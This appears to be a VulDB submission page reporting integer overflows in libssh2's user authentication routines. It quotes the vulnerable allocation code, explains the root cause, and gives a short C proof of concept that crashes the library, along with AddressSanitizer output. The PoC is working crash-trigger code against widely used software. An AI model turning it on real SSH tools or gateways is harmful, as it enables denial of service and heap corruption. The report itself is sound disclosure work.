Submit #805564: libssh2 <= 1.11.1 Integer Overflowinfo

Titellibssh2 <= 1.11.1 Integer Overflow
Beschreibung### Summary An integer overflow vulnerability in libssh2 project user authentication routines leads to heap buffer overflows. By supplying excessively large length values (e.g., `username_len`), an attacker can trigger integer wraparound during buffer size calculations, resulting in undersized heap allocations followed by oversized memory copies. This issue leads to reliable process crashes (Denial of Service) and may enable heap corruption with potential for advanced exploitation under specific conditions. --- ### Details Multiple code paths in `src/userauth.c` perform unchecked integer arithmetic when calculating buffer sizes for authentication packets: #### Vulnerable patterns Path A — `libssh2_userauth_list`: ``` session->userauth_list_data_len = username_len + 27; s = session->userauth_list_data = LIBSSH2_ALLOC(session, session->userauth_list_data_len); *(s++) = SSH_MSG_USERAUTH_REQUEST; _libssh2_store_str(&s, username, username_len); ``` Path B — `libssh2_userauth_password_ex`: ``` session->userauth_pswd_data_len = username_len + 40; s = session->userauth_pswd_data = LIBSSH2_ALLOC(session, session->userauth_pswd_data_len); *(s++) = SSH_MSG_USERAUTH_REQUEST; _libssh2_store_str(&s, username, username_len); ``` Path C — password change callback: ``` if(username_len + password_len + 44 <= UINT_MAX) { session->userauth_pswd_data_len = username_len + password_len + 44; s = session->userauth_pswd_data = LIBSSH2_ALLOC(session, session->userauth_pswd_data_len); } *(s++) = SSH_MSG_USERAUTH_REQUEST; _libssh2_store_str(&s, username, username_len); ``` Root cause: - Arithmetic such as `username_len + constant` is performed using unsigned integers without overflow checks. - If `username_len` is close to `UINT_MAX`, the addition wraps around to a small value. - `LIBSSH2_ALLOC` then allocates a much smaller buffer than intended. - `_libssh2_store_str` performs a `memcpy` of `username_len` bytes into this undersized buffer. This results in a heap buffer overflow. --- ### PoC Compile: ``` gcc -fsanitize=address -g poc.c -o poc -lssh2 ``` Code: ```c #include <libssh2.h> #include <stdlib.h> #include <string.h> #include <stdio.h> int main(){ LIBSSH2_SESSION *session = libssh2_session_init(); unsigned int ulen = 0xFFFFFFE9; char *big = malloc(ulen); memset(big, 'A', ulen); libssh2_userauth_list(session, big, ulen); } ``` Expected result: AddressSanitizer reports a heap-buffer-overflow inside libssh2. ``` ================================================================= ==13815==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7ba7575e0015 at pc 0x7f8758d21c84 bp 0x7ffe40b60b50 sp 0x7ffe40b60310 WRITE of size 4294967273 at 0x7ba7575e0015 thread T0 #0 0x7f8758d21c83 in memcpy ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors_memintrinsics.inc:117 #1 0x7f87593e58d2 (/usr/lib/x86_64-linux-gnu/libssh2.so.1+0x208d2) (BuildId: 3d68ae994d38b39f7f4b2f45bc30938105db4d23) #2 0x7f87593f7e0b in libssh2_userauth_list (/usr/lib/x86_64-linux-gnu/libssh2.so.1+0x32e0b) (BuildId: 3d68ae994d38b39f7f4b2f45bc30938105db4d23) #3 0x564e648461ed in main (/home/kali/Documents/libssh2/poc+0x11ed) (BuildId: 78ebde58466f41946dc9f7d2d7424b91a1553a08) #4 0x7f8758a33f74 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58 #5 0x7f8758a34026 in __libc_start_main_impl ../csu/libc-start.c:360 #6 0x564e648460c0 in _start (/home/kali/Documents/libssh2/poc+0x10c0) (BuildId: 78ebde58466f41946dc9f7d2d7424b91a1553a08) 0x7ba7575e0015 is located 1 bytes after 4-byte region [0x7ba7575e0010,0x7ba7575e0014) allocated by thread T0 here: #0 0x7f8758d2431f in malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:67 #1 0x7f87593f7ddb in libssh2_userauth_list (/usr/lib/x86_64-linux-gnu/libssh2.so.1+0x32ddb) (BuildId: 3d68ae994d38b39f7f4b2f45bc30938105db4d23) SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/lib/x86_64-linux-gnu/libssh2.so.1+0x208d2) (BuildId: 3d68ae994d38b39f7f4b2f45bc30938105db4d23) Shadow bytes around the buggy address: 0x7ba7575dfd80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x7ba7575dfe00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x7ba7575dfe80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x7ba7575dff00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x7ba7575dff80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x7ba7575e0000: fa fa[04]fa fa fa fa fa fa fa fa fa fa fa fa fa 0x7ba7575e0080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x7ba7575e0100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x7ba7575e0180: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x7ba7575e0200: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x7ba7575e0280: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==13815==ABORTING ``` --- ### Impact Type: - Integer overflow (CWE-190) - Heap buffer overflow (CWE-122) Impact: - Reliable Denial of Service (crash) - Heap corruption - Potential for exploitation in specific environments Affected: - Applications that pass user-controlled input to libssh2 authentication APIs - Examples include: - SSH gateways - automation platforms - CI/CD systems - file transfer tools using libssh2 Exploitability: - Modern allocators (glibc, jemalloc): typically result in crash due to integrity checks - Older or custom allocators: may allow controlled heap corruption - No direct information leak primitive observed - RCE not demonstrated, but cannot be ruled out in constrained scenarios
Quelle⚠️ https://github.com/libssh2/libssh2/pull/1858
Benutzer
 dapickle (UID 97309)
Einreichung15.04.2026 08:51 (vor 2 Monaten)
Moderieren01.05.2026 12:45 (16 days later)
StatusAkzeptiert
VulDB Eintrag360555 [libssh2 bis 1.11.1 src/userauth.c userauth_password username_len/password_len Pufferüberlauf]
Punkte20

ZurückÜbersichtWeiter

Want to know what is going to be exploited?

We predict KEV entries!